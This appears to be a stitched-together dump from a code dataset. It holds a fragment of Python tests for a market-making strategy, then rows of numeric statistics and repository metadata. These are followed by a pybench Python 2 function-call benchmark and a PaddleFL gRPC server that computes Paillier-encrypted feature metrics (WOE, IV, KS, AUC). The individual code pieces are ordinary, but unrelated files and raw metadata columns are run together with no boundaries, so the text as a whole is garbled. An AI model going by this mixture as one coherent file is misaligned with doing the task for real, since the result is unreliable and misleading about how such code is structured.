self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(Decimal("1.5"), 
Decimal(str(maker_fill.amount)), places=4) # The default filled_order_delay is 60, so gotta wait 60 + 2 here. self.clock.backtest_til(self.start_timestamp + 62 * self.clock_tick_size + 1) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_bids)) self.assertEqual(5, len(self.inventory_skew_multiple_order_strategy.active_asks)) first_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[0][1] last_bid_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.inventory_skew_multiple_order_strategy.active_asks[-1][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("0.651349"), first_bid_order.quantity) self.assertEqual(Decimal("1.34865"), first_ask_order.quantity) last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3) self.assertEqual(Decimal("1.95404"), last_bid_order.quantity) self.assertEqual(Decimal("4.04595"), last_ask_order.quantity)
52.878808
120
0.707588
9,857
78,102
5.285381
0.040885
0.086952
0.054474
0.026757
0.905294
0.886809
0.87274
0.850589
0.840858
0.827172
0
0.024684
0.198074
78,102
1,476
121
52.914634
0.807127
0.037259
0
0.721193
0
0
0.014319
0
0
0
0
0
0.270749
1
0.036261
false
0.004835
0.019339
0.002417
0.074134
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
82e7a9137be31e07c008d347548e79e64b7d0c91
7,076
py
Python
pypy/translator/microbench/pybench/Calls.py
camillobruni/pygirl
ddbd442d53061d6ff4af831c1eab153bcc771b5a
[ "MIT" ]
12
2016-01-06T07:10:28.000Z
2021-05-13T23:02:02.000Z
pypy/translator/microbench/pybench/Calls.py
woodrow/pyoac
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
[ "MIT" ]
null
null
null
pypy/translator/microbench/pybench/Calls.py
woodrow/pyoac
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
[ "MIT" ]
2
2016-07-29T07:09:50.000Z
2016-10-16T08:50:26.000Z
from pybench import Test class PythonFunctionCalls(Test): version = 0.3 operations = 5*(1+4+4+2) rounds = 60000 def test(self): global f,f1,g,h # define functions def f(): pass def f1(x): pass def g(a,b,c): return a,b,c def h(a,b,c,d=1,e=2,f=3): return d,e,f # do calls for i in xrange(self.rounds): f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) f() f1(i) f1(i) f1(i) f1(i) g(i,i,i) g(i,i,i) g(i,i,i) g(i,i,i) h(i,i,3,i,i) h(i,i,i,2,i,3) def calibrate(self): global f,f1,g,h # define functions def f(): pass def f1(x): pass def g(a,b,c): return a,b,c def h(a,b,c,d=1,e=2,f=3): return d,e,f # do calls for i in xrange(self.rounds): pass ### class BuiltinFunctionCalls(Test): version = 0.4 operations = 5*(2+5+5+5) rounds = 30000 def test(self): # localize functions f0 = globals f1 = hash f2 = cmp f3 = range # do calls for i in xrange(self.rounds): f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f0() f0() f1(i) f1(i) f1(i) f1(i) f1(i) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f2(1,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) f3(1,3,2) def calibrate(self): # localize functions f0 = dir f1 = hash f2 = range f3 = range # do calls for i in xrange(self.rounds): pass ### class PythonMethodCalls(Test): version = 0.3 
operations = 5*(6 + 5 + 4) rounds = 20000 def test(self): class c: x = 2 s = 'string' def f(self): return self.x def j(self,a,b): self.y = a self.t = b return self.y def k(self,a,b,c=3): self.y = a self.s = b self.t = c o = c() for i in xrange(self.rounds): o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) o.f() o.f() o.f() o.f() o.f() o.f() o.j(i,i) o.j(i,i) o.j(i,2) o.j(i,2) o.j(2,2) o.k(i,i) o.k(i,2) o.k(i,2,3) o.k(i,i,c=4) def calibrate(self): class c: x = 2 s = 'string' def f(self): return self.x def j(self,a,b): self.y = a self.t = b def k(self,a,b,c=3): self.y = a self.s = b self.t = c o = c for i in xrange(self.rounds): pass ### class Recursion(Test): version = 0.3 operations = 5 rounds = 50000 def test(self): global f def f(x): if x > 1: return f(x-1) return 1 for i in xrange(self.rounds): f(10) f(10) f(10) f(10) f(10) def calibrate(self): global f def f(x): if x > 0: return f(x-1) return 1 for i in xrange(self.rounds): pass
17.216545
37
0.266535
1,038
7,076
1.816956
0.06262
0.084836
0.092789
0.111347
0.840403
0.820255
0.782078
0.779958
0.747084
0.747084
0
0.126731
0.59186
7,076
410
38
17.258537
0.526316
0.015122
0
0.928125
0
0
0.001727
0
0
0
0
0
0
1
0.075
false
0.025
0.003125
0.01875
0.16875
0
0
0
1
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
7d9fb42eb122b1b65c817f8cc8ed752e5fffdcdb
32,327
py
Python
python/paddle_fl/feature_engineering/core/metrics_server.py
HyphenSun/PaddleFL
08bfddb9160f9595b9ad9fb8563e16e39860e1ac
[ "Apache-2.0" ]
null
null
null
python/paddle_fl/feature_engineering/core/metrics_server.py
HyphenSun/PaddleFL
08bfddb9160f9595b9ad9fb8563e16e39860e1ac
[ "Apache-2.0" ]
null
null
null
python/paddle_fl/feature_engineering/core/metrics_server.py
HyphenSun/PaddleFL
08bfddb9160f9595b9ad9fb8563e16e39860e1ac
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License """ metrics servicer implementation server-side(bob) """ from concurrent import futures import logging import random import numpy as np import pandas as pd import grpc import he_utils as hu from ..proto import metrics_pb2 from ..proto import metrics_pb2_grpc logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) class MpcPositiveRatioServicer(metrics_pb2_grpc.MpcPositiveRatioServicer): """ Positive ratio servicer implementation """ def __init__(self, features, stop_event): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. 
[[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] logger.info('calculating labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} feature_bin = {} for sample_index in range(self._sample_size): feature_value = self._features[sample_index][feature_idx] if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] = self._enc_labels[sample_index] feature_bin[feature_value] = 1 # cal neg sum for key, value in pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) 
neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_sum.append(pos_sum) all_neg_sum.append(neg_sum) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) self._stop_event.set() logger.info('sending labels sum') return feature_labels_sum class MpcWOEServicer(metrics_pb2_grpc.MpcWOEServicer): """ woe servicer implementation """ def __init__(self, features, stop_event, woe_list): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. 
[[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol woe_list: server store the result in woe_list """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._woe_list = woe_list logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] logger.info('calculating labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} feature_bin = {} for sample_index in range(self._sample_size): feature_value = self._features[sample_index][feature_idx] if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] = self._enc_labels[sample_index] feature_bin[feature_value] = 1 # cal neg sum for key, value in pos_sum.items(): 
bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_sum.append(pos_sum) all_neg_sum.append(neg_sum) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending labels sum') return feature_labels_sum def SendWOE(self, request, context): """ client send woe to server """ for feature_idx in range(request.feature_size): woe_dict = request.values[feature_idx].value_dict woe_dict_ = {} for key in woe_dict.keys(): woe_dict_[key] = round(woe_dict[key], 6) self._woe_list.append(woe_dict_) logger.info('received woe') self._stop_event.set() return metrics_pb2.Status(code = 1) class MpcIVServicer(metrics_pb2_grpc.MpcIVServicer): """ iv servicer implementation """ def __init__(self, features, stop_event, iv_list, woe_list=[]): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. 
[[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol iv_list: server store the result in iv_list woe_list: server store the woe in woe_list """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._iv_list = iv_list self._woe_list = woe_list logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] self._all_bind_r_inv = [] logger.info('calculating labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} blind_r_inv_dict = {} feature_bin = {} for sample_index in range(self._sample_size): feature_value = self._features[sample_index][feature_idx] if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] 
= self._enc_labels[sample_index] feature_bin[feature_value] = 1 # cal neg sum for key, value in pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) blind_r_inv_dict[key] = hu.mod_inv(blind_r, self._paillier.n()) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_sum.append(pos_sum) all_neg_sum.append(neg_sum) self._all_bind_r_inv.append(blind_r_inv_dict) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending labels sum') return feature_labels_sum def GetEncIV(self, request, context): """ client get enc iv """ all_iv = [] logger.info('received blind encryptd iv') logger.info('calculating unblind iv') for feature_idx in range(request.feature_size): logger.info('processing feature idx {}'.format(feature_idx)) blind_iv_dict = {} recved_dict = request.values[feature_idx].value_dict iv = self._paillier.encrypt_int64_t(0) for key in recved_dict: blind_iv_dict[key] = self._paillier.decode(recved_dict[key]) blind_iv_dict[key] = self._paillier.homm_mult(blind_iv_dict[key], self._all_bind_r_inv[feature_idx][key]) iv = self._paillier.homm_add(iv, blind_iv_dict[key]) all_iv.append(self._paillier.encode_cipher_bytes(iv)) logger.info('sending unblind encryptd iv') return metrics_pb2.EncFeatureMetric(feature_size = len(all_iv), 
values = all_iv) def SendIV(self, request, context): """ client send iv to server """ iv_list = request.values for feature_idx in range(len(iv_list)): self._iv_list.append(round(iv_list[feature_idx], 6)) logger.info('received iv') self._stop_event.set() return metrics_pb2.Status(code = 1) def SendWOE(self, request, context): """ client send woe to server """ for feature_idx in range(request.feature_size): woe_dict = request.values[feature_idx].value_dict woe_dict_ = {} for key in woe_dict.keys(): woe_dict_[key] = round(woe_dict[key], 6) self._woe_list.append(woe_dict_) logger.info('received woe') return metrics_pb2.Status(code = 1) class MpcKSServicer(metrics_pb2_grpc.MpcKSServicer): """ ks servicer implementation """ def __init__(self, features, stop_event, ks_list, num_thresholds=2047): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. [[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol ks_list: server store the result in ks_list num_thresholds: num of bins """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._ks_list = ks_list self._num_thresholds = num_thresholds logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub 
key') return metrics_pb2.Status(code = 1) def GetCumLabelsSum(self, request, context): """ client get cum labels sum from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_cum_sum = [] all_neg_cum_sum = [] self._all_bind_r_inv = [] logger.info('calculating cum labels sum:') for feature_idx in range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) pos_sum = {} neg_sum = {} blind_r_inv_dict = {} feature_bin = {} feature_values = [val[feature_idx] for val in self._features] # quantile-based discretization,cut feature into equal-sized buckets,return integer indicators of the bins feature_values = pd.qcut(feature_values, q=self._num_thresholds,labels=False, retbins=False, duplicates="drop") # get max bin index, fill nan with this value max_bin_idx = int(max(feature_values) + 1) for sample_index in range(self._sample_size): feature_value = feature_values[sample_index] if np.isnan(feature_value): feature_value = max_bin_idx else: feature_value = int(feature_value) if(feature_value in feature_bin): pos_sum[feature_value] = self._paillier.homm_add(pos_sum[feature_value], self._enc_labels[sample_index]) feature_bin[feature_value] += 1 else: pos_sum[feature_value] = self._enc_labels[sample_index] feature_bin[feature_value] = 1 # sort pos sum pos_sum = dict(sorted(pos_sum.items(), key = lambda item:item[0])) # cal neg sum for key, value in pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) # cum pos and neg pos_temp = self._paillier.encrypt_int64_t(0) neg_temp = self._paillier.encrypt_int64_t(0) for key in pos_sum.keys(): pos_sum[key] = self._paillier.homm_add(pos_sum[key], pos_temp) pos_temp = pos_sum[key] neg_sum[key] = self._paillier.homm_add(neg_sum[key], neg_temp) 
neg_temp = neg_sum[key] #Blind using random numbers N/8 bits for key in pos_sum.keys(): blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) blind_r_inv_dict[key] = hu.mod_inv(blind_r, self._paillier.n()) pos_sum[key] = self._paillier.homm_mult(pos_sum[key], blind_r) pos_sum[key] = self._paillier.encode_cipher_bytes(pos_sum[key]) neg_sum[key] = self._paillier.homm_mult(neg_sum[key], blind_r) neg_sum[key] = self._paillier.encode_cipher_bytes(neg_sum[key]) all_pos_cum_sum.append(pos_sum) all_neg_cum_sum.append(neg_sum) self._all_bind_r_inv.append(blind_r_inv_dict) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_cum_sum[feature_idx]), positive_sum = all_pos_cum_sum[feature_idx], negative_sum = all_neg_cum_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending cum labels sum') return feature_labels_sum def GetEncKS(self, request, context): """ client get enc ks """ logger.info('received blind encryptd ks') logger.info('calculating unblind ks') all_ks = metrics_pb2.EncFeatureMetricList(feature_size = request.feature_size, values = []) for feature_idx in range(request.feature_size): logger.info('processing feature idx {}'.format(feature_idx)) blind_ks_list = [] recved_dict = request.values[feature_idx].value_dict for key in recved_dict.keys(): blind_ks = self._paillier.decode(recved_dict[key]) blind_ks = self._paillier.homm_mult(blind_ks, self._all_bind_r_inv[feature_idx][key]) blind_ks = self._paillier.encode_cipher_bytes(blind_ks) blind_ks_list.append(blind_ks) random.shuffle(blind_ks_list) enc_bin_metric_list = metrics_pb2.EncBinMetricList(bins_size = len(blind_ks_list), value = blind_ks_list) all_ks.values.append(enc_bin_metric_list) logger.info('sending unblind encryptd ks') return all_ks def SendKS(self, request, context): """ client send ks to server """ 
ks_list = request.values for feature_idx in range(len(ks_list)): self._ks_list.append(round(ks_list[feature_idx], 6)) logger.info('received ks') self._stop_event.set() return metrics_pb2.Status(code = 1) class MpcAUCServicer(metrics_pb2_grpc.MpcAUCServicer): """ auc servicer implementation """ def __init__(self, features, stop_event, auc_list, num_thresholds=2047): """ load feature to server prams: features: a feature list in the shape of (sample_size, features_size) e.g. [[4, 3, 1], [1, 2, 5],...,[2, 3 ,2]] (feature_size = 3) stop_event: control the server shutdown when the server does not participate in the protocol auc_list: server store the result in auc_list """ self._sample_size = len(features) self._features = features self._feature_size = len(features[0]) self._stop_event = stop_event self._auc_list = auc_list self._num_thresholds = num_thresholds logger.info('feature size: {0}, sample size: {1}'.format( self._feature_size, self._sample_size)) def SyncSampleSize(self, request, context): """ client sync sample size and feature size with server """ logger.info('received client\'s sample size: {}'.format(request.sample_size)) if request.sample_size == self._sample_size: return metrics_pb2.Sample(sample_size = self._sample_size, feature_size = self._feature_size) else: return metrics_pb2.Sample(sample_size = -1, feature_size = 0) def SendPubkey(self, request, context): """ client send pubkey to server """ paillier = hu.Paillier() paillier.import_pk(request.pk) self._paillier = paillier logger.info('received pub key') return metrics_pb2.Status(code = 1) def GetLabelsSum(self, request, context): """ client get blind auc from server """ batch_size = request.sample_size if (self._sample_size != batch_size): raise ValueError("sample size not equal") logger.info('decoding labels') self._enc_labels = self._paillier.batch_decode(request.labels) all_pos_sum = [] all_neg_sum = [] self._all_auc_blind = [] logger.info('calculating labels sum:') for feature_idx in 
range(self._feature_size): logger.info('processing feature idx {}'.format(feature_idx)) stat_pos_sum = {} stat_neg_sum = {} feature_bin = {} feature_values = [val[feature_idx] for val in self._features] # quantile-based discretization,cut feature into equal-sized buckets,return integer indicators of the bins feature_values = pd.qcut(feature_values, q=self._num_thresholds,labels=False, retbins=False, duplicates="drop") # get max bin index, fill nan with this value max_bin_idx = int(max(feature_values) + 1) for sample_index in range(self._sample_size): if np.isnan(feature_values[sample_index]): bin_idx = max_bin_idx else: bin_idx = int(feature_values[sample_index]) if(bin_idx in feature_bin): stat_pos_sum[bin_idx] = self._paillier.homm_add(stat_pos_sum[bin_idx], self._enc_labels[sample_index]) feature_bin[bin_idx] += 1 else: stat_pos_sum[bin_idx] = self._enc_labels[sample_index] feature_bin[bin_idx] = 1 # sort pos sum stat_pos_sum = dict(sorted(stat_pos_sum.items(), key = lambda item:item[0], reverse=True)) # cal neg sum for key, value in stat_pos_sum.items(): bin_size_cipher = self._paillier.encrypt_int64_t(feature_bin[key]) stat_neg_sum[key] = self._paillier.homm_minus(bin_size_cipher, value) # cal blind_auc and blind res tot_pos = self._paillier.encrypt_int64_t(0) tot_neg = self._paillier.encrypt_int64_t(0) tot_blind = self._paillier.encrypt_int64_t(0) for key in stat_pos_sum.keys(): tot_pos_prev = tot_pos tot_neg_prev = tot_neg tot_pos = self._paillier.homm_add(stat_pos_sum[key], tot_pos) tot_neg = self._paillier.homm_add(stat_neg_sum[key], tot_neg) neg_temp = self._paillier.homm_minus(tot_neg, tot_neg_prev) pos_temp = self._paillier.homm_add(tot_pos, tot_pos_prev) neg_blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) pos_blind_r = self._paillier.get_random_bits(self._paillier.byte_len(0)) cipher_temp = self._paillier.homm_mult(neg_temp, pos_blind_r) tot_blind = self._paillier.homm_add(tot_blind, cipher_temp) cipher_temp = 
self._paillier.homm_mult(pos_temp, neg_blind_r) tot_blind = self._paillier.homm_add(tot_blind, cipher_temp) cipher_temp = self._paillier.homm_mult(self._paillier.encrypt(neg_blind_r), pos_blind_r) tot_blind = self._paillier.homm_add(tot_blind, cipher_temp) neg_temp = self._paillier.homm_add(neg_temp, self._paillier.encrypt(neg_blind_r)) pos_temp = self._paillier.homm_add(pos_temp, self._paillier.encrypt(pos_blind_r)) stat_pos_sum[key] = self._paillier.encode_cipher_bytes(pos_temp) stat_neg_sum[key] = self._paillier.encode_cipher_bytes(neg_temp) all_pos_sum.append(stat_pos_sum) all_neg_sum.append(stat_neg_sum) self._all_auc_blind.append(tot_blind) feature_labels_sum = metrics_pb2.FeatureLabelsSum(feature_size = self._feature_size, labels = []) for feature_idx in range(self._feature_size): bin_labels_sum = metrics_pb2.BinLabelsSum(bins_size = len(all_pos_sum[feature_idx]), positive_sum = all_pos_sum[feature_idx], negative_sum = all_neg_sum[feature_idx]) feature_labels_sum.labels.append(bin_labels_sum) logger.info('sending labels sum') return feature_labels_sum def GetEncAUC(self, request, context): """ client get enc auc """ all_auc_ = [] logger.info('received blind encryptd auc') logger.info('calculating unblind auc') for feature_idx in range(request.feature_size): enc_auc = self._paillier.decode(request.values[feature_idx]) enc_auc = self._paillier.homm_minus(enc_auc, self._all_auc_blind[feature_idx]) all_auc_.append(self._paillier.encode_cipher_bytes(enc_auc)) all_auc = metrics_pb2.EncFeatureMetric(feature_size = request.feature_size, values = all_auc_) logger.info('sending unblind encryptd auc') return all_auc def SendAUC(self, request, context): """ client send auc to server """ auc_list = request.values for feature_idx in range(len(auc_list)): self._auc_list.append(round(auc_list[feature_idx], 6)) logger.info('received auc') self._stop_event.set() return metrics_pb2.Status(code = 1)
45.339411
123
0.584279
3,850
32,327
4.58026
0.068831
0.061245
0.032664
0.025519
0.862935
0.820801
0.787116
0.757741
0.73018
0.705626
0
0.009154
0.327559
32,327
712
124
45.40309
0.802052
0.119529
0
0.709812
0
0.004175
0.045085
0
0
0
0
0
0
1
0.058455
false
0
0.029228
0
0.156576
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7da4146c4da0d8daf5d6211420dc37df80939b31
8,407
py
Python
site_settings/migrations/0026_auto_20210531_0653.py
diffractive/newstream
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
[ "MIT" ]
1
2020-05-03T12:33:42.000Z
2020-05-03T12:33:42.000Z
site_settings/migrations/0026_auto_20210531_0653.py
diffractive/newstream
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
[ "MIT" ]
14
2020-07-06T20:05:57.000Z
2022-03-12T00:39:11.000Z
site_settings/migrations/0026_auto_20210531_0653.py
diffractive/newstream
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
[ "MIT" ]
null
null
null
